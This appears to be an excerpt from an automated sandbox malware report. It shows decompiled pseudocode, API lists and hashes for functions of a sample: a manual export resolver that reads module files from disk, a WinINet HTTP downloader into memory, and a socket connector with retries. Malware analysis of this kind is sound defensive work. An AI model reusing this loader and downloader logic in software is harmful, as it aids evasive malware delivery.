                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87b5797d52ace0c90ef831f7b8f5d1692c77a80e91359cc94c291b188afdef9f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B513B70940218AFDB20CF95DD89FEEB7B4AB48704F24809CE609B7280C7B19A96CF50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC35E0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                    				struct HINSTANCE__* _v12;
                                                                                                                                                                                                                                                    				char _v532;
                                                                                                                                                                                                                                                    				void* _v536;
                                                                                                                                                                                                                                                    				long _v540;
                                                                                                                                                                                                                                                    				void* _v544;
                                                                                                                                                                                                                                                    				long _v548;
                                                                                                                                                                                                                                                    				CHAR* _v552;
                                                                                                                                                                                                                                                    				void* _v556;
                                                                                                                                                                                                                                                    				int _v560;
                                                                                                                                                                                                                                                    				char _v820;
                                                                                                                                                                                                                                                    				CHAR* _v824;
                                                                                                                                                                                                                                                    				char _v1084;
                                                                                                                                                                                                                                                    				signed char _v1085;
                                                                                                                                                                                                                                                    				long _v1092;
                                                                                                                                                                                                                                                    				intOrPtr _v1096;
                                                                                                                                                                                                                                                    				long _t124;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				_v12 = GetModuleHandleA(_a4);
                                                                                                                                                                                                                                                    				if(_v12 != 0) {
                                                                                                                                                                                                                                                    					E00EC2E50( &_v532,  &_v532, 0, 0x208);
                                                                                                                                                                                                                                                    					if(GetModuleFileNameA(_v12,  &_v532, 0x207) > 0) {
                                                                                                                                                                                                                                                    						_v536 = CreateFileA( &_v532, 0x80000000, 7, 0, 3, 0, 0);
                                                                                                                                                                                                                                                    						if(_v536 != 0xffffffff) {
                                                                                                                                                                                                                                                    							_v540 = GetFileSize(_v536, 0);
                                                                                                                                                                                                                                                    							if(_v540 > 0) {
                                                                                                                                                                                                                                                    								_v544 = VirtualAlloc(0, _v540, 0x3000, 4);
                                                                                                                                                                                                                                                    								_t155 = _v544;
                                                                                                                                                                                                                                                    								if(_v544 != 0) {
                                                                                                                                                                                                                                                    									_v548 = 0;
                                                                                                                                                                                                                                                    									ReadFile(_v536, _v544, _v540,  &_v548, 0);
                                                                                                                                                                                                                                                    									_v556 = E00EC3370(_v536, _t155, _v544, _v540);
                                                                                                                                                                                                                                                    									_v552 = E00EC3580(_a8, _v556, _a8);
                                                                                                                                                                                                                                                    									_v560 = lstrlenA(_v552);
                                                                                                                                                                                                                                                    									if(_v560 > 2 && _v560 < 0x100) {
                                                                                                                                                                                                                                                    										_v824 = _v552;
                                                                                                                                                                                                                                                    										_v1085 = 0;
                                                                                                                                                                                                                                                    										E00EC2E50(_v552,  &_v820, 0, 0x100);
                                                                                                                                                                                                                                                    										E00EC2E50(_v552,  &_v1084, 0, 0x100);
                                                                                                                                                                                                                                                    										_v1092 = 0;
                                                                                                                                                                                                                                                    										while(_v1092 < _v560) {
                                                                                                                                                                                                                                                    											if(_v824[_v1092] < 0x20 || _v824[_v1092] > 0x7e) {
                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                    												if(_v824[_v1092] != 0x2e) {
                                                                                                                                                                                                                                                    													_t124 = _v1092 + 1;
                                                                                                                                                                                                                                                    													__eflags = _t124;
                                                                                                                                                                                                                                                    													_v1092 = _t124;
                                                                                                                                                                                                                                                    													continue;
                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                    													lstrcpynA( &_v820, _v824, _v1092 + 1);
                                                                                                                                                                                                                                                    													lstrcatA( &_v820, ".dll");
                                                                                                                                                                                                                                                    													lstrcpyA( &_v1084,  &(_v824[_v1092 + 1]));
                                                                                                                                                                                                                                                    													_v1085 = 1;
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											break;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										if((_v1085 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    											_v8 = E00EC35E0( &_v820,  &_v1084);
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									if(_v8 == 0 && _v552 != 0) {
                                                                                                                                                                                                                                                    										_v1096 = _v552 - _v556;
                                                                                                                                                                                                                                                    										_v8 = _v12 + _v1096;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									VirtualFree(_v556, 0, 0x8000);
                                                                                                                                                                                                                                                    									VirtualFree(_v544, 0, 0x8000);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							CloseHandle(_v536);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                                    0x00ec35e9
                                                                                                                                                                                                                                                    0x00ec35fa
                                                                                                                                                                                                                                                    0x00ec3601
                                                                                                                                                                                                                                                    0x00ec3615
                                                                                                                                                                                                                                                    0x00ec3635
                                                                                                                                                                                                                                                    0x00ec3657
                                                                                                                                                                                                                                                    0x00ec3664
                                                                                                                                                                                                                                                    0x00ec3679
                                                                                                                                                                                                                                                    0x00ec3686
                                                                                                                                                                                                                                                    0x00ec36a2
                                                                                                                                                                                                                                                    0x00ec36a8
                                                                                                                                                                                                                                                    0x00ec36af
                                                                                                                                                                                                                                                    0x00ec36b5
                                                                                                                                                                                                                                                    0x00ec36dd
                                                                                                                                                                                                                                                    0x00ec36f9
                                                                                                                                                                                                                                                    0x00ec3712
                                                                                                                                                                                                                                                    0x00ec3725
                                                                                                                                                                                                                                                    0x00ec3732
                                                                                                                                                                                                                                                    0x00ec374e
                                                                                                                                                                                                                                                    0x00ec3754
                                                                                                                                                                                                                                                    0x00ec3769
                                                                                                                                                                                                                                                    0x00ec377f
                                                                                                                                                                                                                                                    0x00ec3787
                                                                                                                                                                                                                                                    0x00ec37a2
                                                                                                                                                                                                                                                    0x00ec37c6
                                                                                                                                                                                                                                                    0x00ec37e0
                                                                                                                                                                                                                                                    0x00ec37f2
                                                                                                                                                                                                                                                    0x00ec3799
                                                                                                                                                                                                                                                    0x00ec3799
                                                                                                                                                                                                                                                    0x00ec379c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec37f4
                                                                                                                                                                                                                                                    0x00ec380c
                                                                                                                                                                                                                                                    0x00ec381e
                                                                                                                                                                                                                                                    0x00ec383c
                                                                                                                                                                                                                                                    0x00ec3842
                                                                                                                                                                                                                                                    0x00ec3842
                                                                                                                                                                                                                                                    0x00ec37f2
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec37c6
                                                                                                                                                                                                                                                    0x00ec385d
                                                                                                                                                                                                                                                    0x00ec3875
                                                                                                                                                                                                                                                    0x00ec3875
                                                                                                                                                                                                                                                    0x00ec385d
                                                                                                                                                                                                                                                    0x00ec387c
                                                                                                                                                                                                                                                    0x00ec3893
                                                                                                                                                                                                                                                    0x00ec38a2
                                                                                                                                                                                                                                                    0x00ec38a2
                                                                                                                                                                                                                                                    0x00ec38b3
                                                                                                                                                                                                                                                    0x00ec38c7
                                                                                                                                                                                                                                                    0x00ec38c7
                                                                                                                                                                                                                                                    0x00ec36af
                                                                                                                                                                                                                                                    0x00ec38d4
                                                                                                                                                                                                                                                    0x00ec38d4
                                                                                                                                                                                                                                                    0x00ec3664
                                                                                                                                                                                                                                                    0x00ec3635
                                                                                                                                                                                                                                                    0x00ec38e0

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?), ref: 00EC35F4
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 00EC362D
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00EC3651
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00EC3673
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00EC369C
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00EC36DD
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00EC371F
                                                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,-00000001), ref: 00EC380C
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,.dll), ref: 00EC381E
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 00EC383C
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EC38B3
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00EC38C7
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00EC38D4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Virtual$FreeHandleModule$AllocCloseCreateNameReadSizelstrcatlstrcpylstrcpynlstrlen
                                                                                                                                                                                                                                                    • String ID: .dll
                                                                                                                                                                                                                                                    • API String ID: 4040249471-2738580789
                                                                                                                                                                                                                                                    • Opcode ID: 237c1d52547824e3b33be101ad14095dfab214b85a7741421196000d20618922
                                                                                                                                                                                                                                                    • Instruction ID: ce6e7ba8f19877a8d1aa1d0f12abf6f50adbc1e9348168ad85ca28aad8bf6d01
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 237c1d52547824e3b33be101ad14095dfab214b85a7741421196000d20618922
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 638158B1D40228AFDB24DBA0DD89FD9B7B9AB18304F1081DCF20DB6280D6759B86CF55
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                                    			E00EC2AF0(char* _a4, intOrPtr _a8, long _a12, signed char _a16) {
                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                    				char _v84;
                                                                                                                                                                                                                                                    				void* _v88;
                                                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                                                    				long _v96;
                                                                                                                                                                                                                                                    				void _v100;
                                                                                                                                                                                                                                                    				void _v356;
                                                                                                                                                                                                                                                    				long _v360;
                                                                                                                                                                                                                                                    				long _v364;
                                                                                                                                                                                                                                                    				intOrPtr _v368;
                                                                                                                                                                                                                                                    				void* _v372;
                                                                                                                                                                                                                                                    				long _v376;
                                                                                                                                                                                                                                                    				void* _v380;
                                                                                                                                                                                                                                                    				signed char _v381;
                                                                                                                                                                                                                                                    				long _v388;
                                                                                                                                                                                                                                                    				long _v392;
                                                                                                                                                                                                                                                    				void* _v396;
                                                                                                                                                                                                                                                    				char _v652;
                                                                                                                                                                                                                                                    				long _v656;
                                                                                                                                                                                                                                                    				long _v660;
                                                                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                                                                    				void* _t140;
                                                                                                                                                                                                                                                    				void* _t142;
                                                                                                                                                                                                                                                    				long _t149;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if( *0xed3b80 == 0 || _a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                    					L25:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					memcpy( &_v84, "Accept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip, deflate\r\n", 0x10 << 2);
                                                                                                                                                                                                                                                    					asm("movsw");
                                                                                                                                                                                                                                                    					asm("movsb");
                                                                                                                                                                                                                                                    					_v92 = 0x80000200;
                                                                                                                                                                                                                                                    					if((_a16 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						_v92 = _v92 | 0x00803000;
                                                                                                                                                                                                                                                    						_v96 = 4;
                                                                                                                                                                                                                                                    						_t139 =  *0xed3b80; // 0x0
                                                                                                                                                                                                                                                    						InternetQueryOptionA(_t139, 0x1f,  &_v100,  &_v96);
                                                                                                                                                                                                                                                    						_v100 = _v100 | 0x00000100;
                                                                                                                                                                                                                                                    						_t140 =  *0xed3b80; // 0x0
                                                                                                                                                                                                                                                    						InternetSetOptionA(_t140, 0x1f,  &_v100, 4);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t142 =  *0xed3b80; // 0x0
                                                                                                                                                                                                                                                    					_v88 = InternetOpenUrlA(_t142, _a4,  &_v84, 0x42, _v92, 0);
                                                                                                                                                                                                                                                    					if(_v88 == 0) {
                                                                                                                                                                                                                                                    						_v660 = GetLastError();
                                                                                                                                                                                                                                                    						goto L25;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_v360 = 0x100;
                                                                                                                                                                                                                                                    						E00EC7D20( &_v356,  &_v356, 0, 0x100);
                                                                                                                                                                                                                                                    						_v364 = 0;
                                                                                                                                                                                                                                                    						if(HttpQueryInfoA(_v88, 0x13,  &_v356,  &_v360,  &_v364) == 0) {
                                                                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                                                                    							InternetCloseHandle(_v88);
                                                                                                                                                                                                                                                    							goto L25;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v368 = E00EC7DD0( &_v356);
                                                                                                                                                                                                                                                    						if(_v368 != 0xc8) {
                                                                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v372 = VirtualAlloc(0, _a12, 0x3000, 4);
                                                                                                                                                                                                                                                    						if(_v372 == 0) {
                                                                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v388 = 0;
                                                                                                                                                                                                                                                    						_v376 = 0;
                                                                                                                                                                                                                                                    						_v380 = _v372;
                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                    							InternetReadFile(_v88, _v380, _a12,  &_v376);
                                                                                                                                                                                                                                                    							if(_v376 == 0) {
                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v388 = _v388 + _v376;
                                                                                                                                                                                                                                                    							_v380 = _v380 + _v376;
                                                                                                                                                                                                                                                    							_t149 = _a12 - _v376;
                                                                                                                                                                                                                                                    							_a12 = _t149;
                                                                                                                                                                                                                                                    							if(_t149 >= 0) {
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							L16:
                                                                                                                                                                                                                                                    							_v8 = _v388;
                                                                                                                                                                                                                                                    							_v396 = _v372;
                                                                                                                                                                                                                                                    							_v392 = 0x100;
                                                                                                                                                                                                                                                    							E00EC7D20(_v388,  &_v652, 0, 0x100);
                                                                                                                                                                                                                                                    							_v381 = 0;
                                                                                                                                                                                                                                                    							if(HttpQueryInfoA(_v88, 0x1d,  &_v652,  &_v392,  &_v364) != 0 && lstrcmpiA( &_v652, "gzip") == 0) {
                                                                                                                                                                                                                                                    								_v656 = E00EC2E00(_v388, _v372, _v388, _a8, _a12);
                                                                                                                                                                                                                                                    								if(_v656 > 0) {
                                                                                                                                                                                                                                                    									_v8 = _v656;
                                                                                                                                                                                                                                                    									_v396 = _a8;
                                                                                                                                                                                                                                                    									_v381 = 1;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							if((_v381 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    								E00EC7B70(_a8, _v372, _v8);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							VirtualFree(_v372, 0, 0x8000);
                                                                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}



























                                                                                                                                                                                                                                                    0x00ec2afb
                                                                                                                                                                                                                                                    0x00ec2b09
                                                                                                                                                                                                                                                    0x00ec2df2
                                                                                                                                                                                                                                                    0x00ec2dfa
                                                                                                                                                                                                                                                    0x00ec2b2d
                                                                                                                                                                                                                                                    0x00ec2b3a
                                                                                                                                                                                                                                                    0x00ec2b3c
                                                                                                                                                                                                                                                    0x00ec2b3e
                                                                                                                                                                                                                                                    0x00ec2b3f
                                                                                                                                                                                                                                                    0x00ec2b4c
                                                                                                                                                                                                                                                    0x00ec2b57
                                                                                                                                                                                                                                                    0x00ec2b5a
                                                                                                                                                                                                                                                    0x00ec2b6b
                                                                                                                                                                                                                                                    0x00ec2b72
                                                                                                                                                                                                                                                    0x00ec2b81
                                                                                                                                                                                                                                                    0x00ec2b8c
                                                                                                                                                                                                                                                    0x00ec2b93
                                                                                                                                                                                                                                                    0x00ec2b93
                                                                                                                                                                                                                                                    0x00ec2ba9
                                                                                                                                                                                                                                                    0x00ec2bb6
                                                                                                                                                                                                                                                    0x00ec2bbd
                                                                                                                                                                                                                                                    0x00ec2de0
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2bc3
                                                                                                                                                                                                                                                    0x00ec2bc3
                                                                                                                                                                                                                                                    0x00ec2bdb
                                                                                                                                                                                                                                                    0x00ec2be3
                                                                                                                                                                                                                                                    0x00ec2c10
                                                                                                                                                                                                                                                    0x00ec2dce
                                                                                                                                                                                                                                                    0x00ec2dd2
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2dd2
                                                                                                                                                                                                                                                    0x00ec2c25
                                                                                                                                                                                                                                                    0x00ec2c35
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2c4e
                                                                                                                                                                                                                                                    0x00ec2c5b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2c61
                                                                                                                                                                                                                                                    0x00ec2c6b
                                                                                                                                                                                                                                                    0x00ec2c7b
                                                                                                                                                                                                                                                    0x00ec2c81
                                                                                                                                                                                                                                                    0x00ec2c97
                                                                                                                                                                                                                                                    0x00ec2ca4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2cb4
                                                                                                                                                                                                                                                    0x00ec2cc6
                                                                                                                                                                                                                                                    0x00ec2ccf
                                                                                                                                                                                                                                                    0x00ec2cd5
                                                                                                                                                                                                                                                    0x00ec2cd8
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2cdc
                                                                                                                                                                                                                                                    0x00ec2cde
                                                                                                                                                                                                                                                    0x00ec2ce4
                                                                                                                                                                                                                                                    0x00ec2ced
                                                                                                                                                                                                                                                    0x00ec2cf3
                                                                                                                                                                                                                                                    0x00ec2d0b
                                                                                                                                                                                                                                                    0x00ec2d13
                                                                                                                                                                                                                                                    0x00ec2d3d
                                                                                                                                                                                                                                                    0x00ec2d70
                                                                                                                                                                                                                                                    0x00ec2d7d
                                                                                                                                                                                                                                                    0x00ec2d85
                                                                                                                                                                                                                                                    0x00ec2d8b
                                                                                                                                                                                                                                                    0x00ec2d91
                                                                                                                                                                                                                                                    0x00ec2d91
                                                                                                                                                                                                                                                    0x00ec2d7d
                                                                                                                                                                                                                                                    0x00ec2da1
                                                                                                                                                                                                                                                    0x00ec2db2
                                                                                                                                                                                                                                                    0x00ec2db7
                                                                                                                                                                                                                                                    0x00ec2dc8
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2dc8
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2ca6
                                                                                                                                                                                                                                                    0x00ec2bbd

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC2B72
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC2B93
                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,00000000,?,00000042,80000200,00000000), ref: 00EC2BB0
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00EC2C08
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00EC2C48
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000000,00000000), ref: 00EC2C97
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,0000001D,?,00000100,00000000), ref: 00EC2D35
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,gzip), ref: 00EC2D4B
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00EC2DC8
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00EC2DD2
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00EC2DDA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • gzip, xrefs: 00EC2D3F
                                                                                                                                                                                                                                                    • Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate, xrefs: 00EC2B32
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$Query$HttpInfoOptionVirtual$AllocCloseErrorFileFreeHandleLastOpenReadlstrcmpi
                                                                                                                                                                                                                                                    • String ID: Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate$gzip
                                                                                                                                                                                                                                                    • API String ID: 2564233093-2863726208
                                                                                                                                                                                                                                                    • Opcode ID: 98786d1c341d719d3b741061c802dab10559ba04320c72d42030afcdb26172ca
                                                                                                                                                                                                                                                    • Instruction ID: 7747cf72243e60bf3beef16d57822decac46d99663792cba81c7c937a22c4a6e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98786d1c341d719d3b741061c802dab10559ba04320c72d42030afcdb26172ca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88911A71904218AFDB25CFA5CD48FEAB7B5BB48304F14819DE609BB280DB765A89CF50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                                    			E00ECA090(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                                    				signed char _v8;
                                                                                                                                                                                                                                                    				short _v12;
                                                                                                                                                                                                                                                    				signed char _v13;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				short _v34;
                                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                                                                                    				char* _t42;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_push(6);
                                                                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                                                                    				_push(2);
                                                                                                                                                                                                                                                    				L00ECB210();
                                                                                                                                                                                                                                                    				_v20 = __eax;
                                                                                                                                                                                                                                                    				if(_v20 != 0xffffffff) {
                                                                                                                                                                                                                                                    					_v36 = 2;
                                                                                                                                                                                                                                                    					_push(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                    					L00ECB20A();
                                                                                                                                                                                                                                                    					_v34 = 2;
                                                                                                                                                                                                                                                    					_push(_a4);
                                                                                                                                                                                                                                                    					L00ECB204();
                                                                                                                                                                                                                                                    					_v12 = 2;
                                                                                                                                                                                                                                                    					if(_v12 == 0) {
                                                                                                                                                                                                                                                    						return 0xffffffffffffffff;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
                                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                                    					_v13 = 0;
                                                                                                                                                                                                                                                    					_v40 = 0;
                                                                                                                                                                                                                                                    					while(_v40 < _a12) {
                                                                                                                                                                                                                                                    						_push(0x10);
                                                                                                                                                                                                                                                    						_t42 =  &_v36;
                                                                                                                                                                                                                                                    						_push(_t42);
                                                                                                                                                                                                                                                    						_push(_v20);
                                                                                                                                                                                                                                                    						L00ECB1FE();
                                                                                                                                                                                                                                                    						if(_t42 != 0) {
                                                                                                                                                                                                                                                    							_v40 = _v40 + 1;
                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v13 = 1;
                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						if(_a16 != 0) {
                                                                                                                                                                                                                                                    							_v44 = _a16;
                                                                                                                                                                                                                                                    							_push(4);
                                                                                                                                                                                                                                                    							_push( &_v44);
                                                                                                                                                                                                                                                    							_push(0x1005);
                                                                                                                                                                                                                                                    							_push(0xffff);
                                                                                                                                                                                                                                                    							_push(_v20);
                                                                                                                                                                                                                                                    							L00ECB1F2();
                                                                                                                                                                                                                                                    							_push(4);
                                                                                                                                                                                                                                                    							_push( &_v44);
                                                                                                                                                                                                                                                    							_push(0x1006);
                                                                                                                                                                                                                                                    							_push(0xffff);
                                                                                                                                                                                                                                                    							_push(_v20);
                                                                                                                                                                                                                                                    							L00ECB1F2();
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						return _v20;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t40 = _v20;
                                                                                                                                                                                                                                                    					_push(_t40);
                                                                                                                                                                                                                                                    					L00ECB1F8();
                                                                                                                                                                                                                                                    					return _t40 | 0xffffffff;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v20;
                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                    0x00eca096
                                                                                                                                                                                                                                                    0x00eca098
                                                                                                                                                                                                                                                    0x00eca09a
                                                                                                                                                                                                                                                    0x00eca09c
                                                                                                                                                                                                                                                    0x00eca0a1
                                                                                                                                                                                                                                                    0x00eca0a8
                                                                                                                                                                                                                                                    0x00eca0b7
                                                                                                                                                                                                                                                    0x00eca0bf
                                                                                                                                                                                                                                                    0x00eca0c0
                                                                                                                                                                                                                                                    0x00eca0c5
                                                                                                                                                                                                                                                    0x00eca0cc
                                                                                                                                                                                                                                                    0x00eca0cd
                                                                                                                                                                                                                                                    0x00eca0d2
                                                                                                                                                                                                                                                    0x00eca0d9
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00eca0ea
                                                                                                                                                                                                                                                    0x00eca0e5
                                                                                                                                                                                                                                                    0x00eca0f2
                                                                                                                                                                                                                                                    0x00eca0f9
                                                                                                                                                                                                                                                    0x00eca0fd
                                                                                                                                                                                                                                                    0x00eca10f
                                                                                                                                                                                                                                                    0x00eca117
                                                                                                                                                                                                                                                    0x00eca119
                                                                                                                                                                                                                                                    0x00eca11c
                                                                                                                                                                                                                                                    0x00eca120
                                                                                                                                                                                                                                                    0x00eca121
                                                                                                                                                                                                                                                    0x00eca128
                                                                                                                                                                                                                                                    0x00eca10c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00eca10c
                                                                                                                                                                                                                                                    0x00eca12a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00eca12a
                                                                                                                                                                                                                                                    0x00eca138
                                                                                                                                                                                                                                                    0x00eca14c
                                                                                                                                                                                                                                                    0x00eca151
                                                                                                                                                                                                                                                    0x00eca154
                                                                                                                                                                                                                                                    0x00eca159
                                                                                                                                                                                                                                                    0x00eca15a
                                                                                                                                                                                                                                                    0x00eca15f
                                                                                                                                                                                                                                                    0x00eca167
                                                                                                                                                                                                                                                    0x00eca168
                                                                                                                                                                                                                                                    0x00eca16d
                                                                                                                                                                                                                                                    0x00eca172
                                                                                                                                                                                                                                                    0x00eca173
                                                                                                                                                                                                                                                    0x00eca178
                                                                                                                                                                                                                                                    0x00eca180
                                                                                                                                                                                                                                                    0x00eca181
                                                                                                                                                                                                                                                    0x00eca181
